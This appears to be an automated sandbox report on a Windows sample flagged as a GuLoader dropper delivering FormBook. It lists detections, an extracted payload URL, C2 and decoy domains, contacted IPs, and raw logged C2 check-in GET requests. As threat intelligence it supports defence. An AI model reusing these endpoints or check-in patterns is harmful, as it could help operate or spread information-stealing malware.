Windows Analysis Report Zr26f1rL6r.exe

AV Detection:

Found malware configuration

Source: 0000001E.00000000.51287210518.0000000000560000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "https://atseasonals.com/GHrtt/bin_k"}

Source: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.ayudavida.com/n8ds/"], "decoy": ["topwowshopping.store", "helpcloud.xyz", "reliablehomesellers.com", "lopsrental.lease", "luxalbridi.com", "recoverytrivia.com", "apps365.one", "shrywl.com", "ozattaos.xyz", "recruitresumelibrary.com", "receiptpor.xyz", "stylesbykee.com", "dczhd.com", "learncodeing.com", "cmoigus.net", "unitedmetal-saudi.com", "koedayuuki.com", "dif-directory.xyz", "heyvecino.com", "mariforum.com", "mackthetruck.com", "quickcoreohio.com", "wordpresshostingblog.com", "peo-campaign.com", "hsbp.online", "divorcefearfreedom.com", "testwebsite0711.com", "khoashop.com", "32342231.xyz", "inklusion.online", "jobl.space", "maroonday.com", "mummymotors.com", "diamota.com", "effective.store", "theyachtmarkets.com", "braxtynmi.xyz", "photon4energy.com", "dubaicars.online", "growebox.com", "abcjanitorialsolutions.com", "aubzo7o9fm.com", "betallsports247.com", "nphone.tech", "diggingquartz.com", "yghdlhax.xyz", "paulalescanorealestate.com", "chaudharyhamza.com", "jamiecongedo.com", "gdav130.xyz", "dietatrintadias.com", "csenmoga.com", "avto-click.com", "goldcoastdoublelot.com", "blueitsolutions.info", "fatima2021.com", "talkingpoint.tours", "smartam6.xyz", "tvterradafarinha.com", "palmasdelmarcondos.com", "3uwz9mpxk77g.biz", "zzytyzf.top", "writingmomsobitwithmom.com", "littlefishth.com"]}

Multi AV Scanner detection for submitted file

Source: Zr26f1rL6r.exe	Virustotal: Detection: 40%			Perma Link
Source: Zr26f1rL6r.exe	ReversingLabs: Detection: 20%

Yara detected FormBook

Source: Yara match	File source: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.47948793587.000000001E520000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.47834355504.0000000011F4F000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.47938169208.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.51921251635.0000000000C70000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.51921478226.0000000000CA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.47886932964.0000000011F4F000.00000040.00020000.sdmp, type: MEMORY

Antivirus detection for URL or domain

Source: http://www.jamiecongedo.com/n8ds/?6ldD=BkWPMdYTTR0ZQmtbwmm8ayu+d1W65DpSRIKYH6pwPIESNdIBtEF9Jb3WD/+idhQ1krue&2dfPiT=o6P8yX

Avira URL Cloud: Label: malware

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\Grt4lhl\c8ahotgz8h.exe

ReversingLabs: Detection: 20%

Antivirus or Machine Learning detection for unpacked file

Source: 15.2.rundll32.exe.488796c.4.unpack	Avira: Label: TR/Dropper.Gen
Source: 15.2.rundll32.exe.540a58.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 25.0.firefox.exe.4009796c.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 25.0.firefox.exe.4009796c.1.unpack	Avira: Label: TR/Dropper.Gen
Source: 25.2.firefox.exe.4009796c.0.unpack	Avira: Label: TR/Dropper.Gen

Compliance:

Uses 32bit PE files

Source: Zr26f1rL6r.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Uses secure TLS version for HTTPS connections

Source: unknown	HTTPS traffic detected: 107.6.148.162:443 -> 192.168.11.20:49812 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.6.148.162:443 -> 192.168.11.20:49837 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.6.148.162:443 -> 192.168.11.20:49840 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.6.148.162:443 -> 192.168.11.20:49841 version: TLS 1.2

Binary contains paths to debug symbols

Source:	Binary string: wntdll.pdbUGP source: Zr26f1rL6r.exe, 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, rundll32.exe, 0000000F.00000002.51926935310.000000000445D000.00000040.00000001.sdmp, rundll32.exe, 0000000F.00000002.51925522665.0000000004330000.00000040.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51672974108.000000001E9AD000.00000040.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51671672072.000000001E880000.00000040.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51750821024.000000001E890000.00000040.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51752294745.000000001E9BD000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: c8ahotgz8h.exe, c8ahotgz8h.exe, 0000001E.00000002.51750821024.000000001E890000.00000040.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51752294745.000000001E9BD000.00000040.00000001.sdmp
Source:	Binary string: rundll32.pdb source: Zr26f1rL6r.exe, 0000000A.00000002.47938438528.00000000000D0000.00000040.00020000.sdmp, Zr26f1rL6r.exe, 0000000A.00000003.47933760701.00000000008E5000.00000004.00000001.sdmp
Source:	Binary string: rundll32.pdbGCTL source: Zr26f1rL6r.exe, 0000000A.00000002.47938438528.00000000000D0000.00000040.00020000.sdmp, Zr26f1rL6r.exe, 0000000A.00000003.47933760701.00000000008E5000.00000004.00000001.sdmp

Spreading:

Contains functionality to enumerate / list files inside a directory

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_0040FA90 FindFirstFileW,FindNextFileW,FindClose,		15_2_0040FA90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_0040FA89 FindFirstFileW,FindNextFileW,FindClose,		15_2_0040FA89

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49815 -> 104.21.76.223:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49815 -> 104.21.76.223:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49815 -> 104.21.76.223:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49817 -> 164.155.212.139:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49817 -> 164.155.212.139:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49817 -> 164.155.212.139:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49818 -> 172.120.157.187:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49818 -> 172.120.157.187:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49818 -> 172.120.157.187:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49819 -> 3.64.163.50:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49819 -> 3.64.163.50:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49819 -> 3.64.163.50:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49823 -> 172.67.164.153:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49823 -> 172.67.164.153:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49823 -> 172.67.164.153:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49824 -> 3.64.163.50:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49824 -> 3.64.163.50:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49824 -> 3.64.163.50:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49826 -> 3.64.163.50:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49826 -> 3.64.163.50:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49826 -> 3.64.163.50:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49836 -> 3.64.163.50:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49836 -> 3.64.163.50:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49836 -> 3.64.163.50:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49843 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49843 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49843 -> 34.102.136.180:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 88.99.22.5 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 172.120.157.187 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 3.64.163.50 80			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 116.62.216.226 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 172.67.164.153 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 192.0.78.25 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.21.76.223 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 66.29.140.185 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.185.159.144 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 81.2.194.128 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 203.170.80.250 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 164.155.212.139 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 136.143.191.204 80			Jump to behavior

Performs DNS queries to domains with low reputation

Source:	DNS query: www.braxtynmi.xyz
Source:	DNS query: www.braxtynmi.xyz
Source:	DNS query: www.helpcloud.xyz
Source:	DNS query: www.ozattaos.xyz
Source:	DNS query: www.braxtynmi.xyz
Source:	DNS query: www.braxtynmi.xyz
Source:	DNS query: www.braxtynmi.xyz
Source:	DNS query: www.braxtynmi.xyz
Source:	DNS query: www.braxtynmi.xyz

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: https://atseasonals.com/GHrtt/bin_k
Source: Malware configuration extractor	URLs: www.ayudavida.com/n8ds/

Tries to resolve many domain names, but no domain seems valid

Source: unknown	DNS traffic detected: query: www.tvterradafarinha.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.aubzo7o9fm.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.koedayuuki.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.recoverytrivia.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.wordpresshostingblog.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.abcjanitorialsolutions.com replaycode: Server failure (2)
Source: unknown	DNS traffic detected: query: www.recruitresumelibrary.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.testwebsite0711.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.diamota.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.braxtynmi.xyz replaycode: Server failure (2)
Source: unknown	DNS traffic detected: query: www.learncodeing.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.3uwz9mpxk77g.biz replaycode: Server failure (2)
Source: unknown	DNS traffic detected: query: www.photon4energy.com replaycode: Name error (3)

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: HETZNER-ASDE HETZNER-ASDE
Source: Joe Sandbox View	ASN Name: EGIHOSTINGUS EGIHOSTINGUS
Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /n8ds/?6ldD=WOFmZk82z8UpNC4mY/AvD/Zy3C9NxlTUz/ym6JpmI0LbMg439xvRHQoxZAlOCyCIZ92f&v6Mt=3fxxA4Z HTTP/1.1Host: www.topwowshopping.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?6ldD=c2GcPcxTJCn2LTXtZlkaUw2pSxcw64fMJrFLz4vK/kX5/sVAgoQGq8HC2c+bDUK23KGm&v6Mt=3fxxA4Z HTTP/1.1Host: www.growebox.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?6ldD=XGdb25Y748Ut0VrvAGrAV9TZskQ8Vhp7eMrkuH6lQS7YMNVmEhdbMrp7c3mVg154ue/4&v6Mt=3fxxA4Z HTTP/1.1Host: www.ayudavida.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?6ldD=QiVr4NomMTfDVQzLAZiPy17hhsXauZOjQhEkIhfcDYRSe01pzyB5iClqESLJZee3iuRd&v6Mt=3fxxA4Z HTTP/1.1Host: www.stylesbykee.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?6ldD=4XwYGzmPDVH3THQXSPknmfdazTodAXDlHas2KNX7n/UXs4ghRUZWEGvkVm0hYsfSCvUh&v6Mt=3fxxA4Z HTTP/1.1Host: www.inklusion.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?6ldD=hTCtvfJBK6Lgcsnz9iNzW/om0skZHj2xUOZ9QRyIykKuA9BOdz3qmP8oX5t0meM3+FVL&v6Mt=3fxxA4Z HTTP/1.1Host: www.mackthetruck.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?6ldD=4vxveAhDLD1bBBVBYGklTAgHIjczf9yiSG6BwPp//N0BMhpP0xQNoBxeqzaksixrbhTl&5jp=eZ4Pez HTTP/1.1Host: www.helpcloud.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?6ldD=n1UrTr6j/bQFz4e4Cp8BbMP0v/KiHdXZ9JkrSrs2y278xAws0T3fM8y5E13MJVyQk50j&5jp=eZ4Pez HTTP/1.1Host: www.ozattaos.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?6ldD=4XwYGzmPDVH3THQXSPknmfdazTodAXDlHas2KNX7n/UXs4ghRUZWEGvkVm0hYsfSCvUh&5jp=eZ4Pez HTTP/1.1Host: www.inklusion.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?6ldD=diws0RRfDxwvVlRuoC4BJCkr8rc2YRL+Z6kcdn/HANybL0ntvNIGnh8uTRYHcPOHwusF&5jp=eZ4Pez HTTP/1.1Host: www.unitedmetal-saudi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?6ldD=4XwYGzmPDVH3THQXSPknmfdazTodAXDlHas2KNX7n/UXs4ghRUZWEGvkVm0hYsfSCvUh&v6Mt=3fxxA4Z HTTP/1.1Host: www.inklusion.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?6ldD=hTCtvfJBK6Lgcsnz9iNzW/om0skZHj2xUOZ9QRyIykKuA9BOdz3qmP8oX5t0meM3+FVL&v6Mt=3fxxA4Z HTTP/1.1Host: www.mackthetruck.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?2dfPiT=o6P8yX&6ldD=xlQ0Win+OWEEdOu7BqbL/FEFl5i/i6MXL9UXMpB5xFgkztpNPhPNR2/8wQo9B3jWcPv9 HTTP/1.1Host: www.divorcefearfreedom.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?6ldD=BkWPMdYTTR0ZQmtbwmm8ayu+d1W65DpSRIKYH6pwPIESNdIBtEF9Jb3WD/+idhQ1krue&2dfPiT=o6P8yX HTTP/1.1Host: www.jamiecongedo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?6ldD=nk91cKg8qOwhKsLnO/dUua/naUDhyNO+v5raVsad7WuGJwv5YN6kPTcjqATZ67dmN8K4&v6Mt=3fxxA4Z HTTP/1.1Host: www.lopsrental.leaseConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?6ldD=4XwYGzmPDVH3THQXSPknmfdazTodAXDlHas2KNX7n/UXs4ghRUZWEGvkVm0hYsfSCvUh&v6Mt=3fxxA4Z HTTP/1.1Host: www.inklusion.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?6ldD=hTCtvfJBK6Lgcsnz9iNzW/om0skZHj2xUOZ9QRyIykKuA9BOdz3qmP8oX5t0meM3+FVL&v6Mt=3fxxA4Z HTTP/1.1Host: www.mackthetruck.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 3.64.163.50 3.64.163.50

Uses HTTPS

Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812

Tries to download or post to a non-existing HTTP route (HTTP/1.1 404 Not Found / 503 Service Unavailable / 403 Forbidden)

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 25 Nov 2021 11:56:13 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecache-control: no-cache, no-store, must-revalidate,post-check=0,pre-check=0expires: 0last-modified: Thu, 25 Nov 2021 11:56:13 GMTpragma: no-cachevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wftVfpJA1zZJwjRaaheNSQN%2B47kW8NUpVPnztY9X9CDRJcJK3cSrWrr%2Fkh12oU%2BPDjaHHxgPOGqNMJdKZBB2VmnTOlRI%2FV3g8s4dK2XbZbitRDqmmAxJtUHBGjKUUJ1RfXt9WyadqG7lXv0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6b3ab146a9874e37-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a Data Ascii: d404 Not Found

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 25 Nov 2021 11:59:31 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 282Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 6f 70 73 72 65 6e 74 61 6c 2e 6c 65 61 73 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.lopsrental.lease Port 80</address></body></html>

Connects to IPs without corresponding DNS lookups

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Found strings which match to known social media urls

Source: rundll32.exe, 0000000F.00000002.51930274495.0000000004E8C000.00000004.00020000.sdmp, rundll32.exe, 0000000F.00000002.51931184090.0000000005562000.00000004.00020000.sdmp, firefox.exe, 00000019.00000000.50714620925.0000000040D72000.00000004.00020000.sdmp	String found in binary or memory: .www.linkedin.combscookie/ equals www.linkedin.com (Linkedin)
Source: rundll32.exe, 0000000F.00000002.51930274495.0000000004E8C000.00000004.00020000.sdmp, rundll32.exe, 0000000F.00000002.51931184090.0000000005562000.00000004.00020000.sdmp, firefox.exe, 00000019.00000000.50714620925.0000000040D72000.00000004.00020000.sdmp	String found in binary or memory: .www.linkedin.combscookie/+= equals www.linkedin.com (Linkedin)
Source: rundll32.exe, 0000000F.00000002.51930274495.0000000004E8C000.00000004.00020000.sdmp, rundll32.exe, 0000000F.00000002.51931184090.0000000005562000.00000004.00020000.sdmp, firefox.exe, 00000019.00000000.50714620925.0000000040D72000.00000004.00020000.sdmp	String found in binary or memory: .www.linkedin.combscookie//a equals www.linkedin.com (Linkedin)

URLs found in memory or binary data

Source: rundll32.exe, 0000000F.00000002.51918146774.0000000000540000.00000004.00000020.sdmp, rundll32.exe, 0000000F.00000002.51929803226.00000000048A8000.00000004.00020000.sdmp, firefox.exe, 00000019.00000002.50719834239.00000000400B8000.00000004.00020000.sdmp, Zr26f1rL6r.exe, c8ahotgz8h.exe.14.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: rundll32.exe, 0000000F.00000002.51918146774.0000000000540000.00000004.00000020.sdmp, rundll32.exe, 0000000F.00000002.51929803226.00000000048A8000.00000004.00020000.sdmp, firefox.exe, 00000019.00000002.50719834239.00000000400B8000.00000004.00020000.sdmp, Zr26f1rL6r.exe, c8ahotgz8h.exe.14.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: Zr26f1rL6r.exe, 0000000A.00000003.47750089783.00000000008A1000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000003.47747204902.00000000008A4000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000003.47749712400.0000000000897000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000002.47940136411.00000000008A4000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000003.47749088416.00000000008A1000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000003.47748575933.000000000089B000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000003.51528821495.00000000008B5000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51535905323.00000000008B8000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000003.51527312447.00000000008B5000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000003.51656071026.000000000093C000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51662682902.000000000093F000.00000004.00000020.sdmp, c8ahotgz8h.exe, 0000001D.00000003.51655285321.000000000093C000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000003.51735030977.000000000081C000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51741787959.000000000081C000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
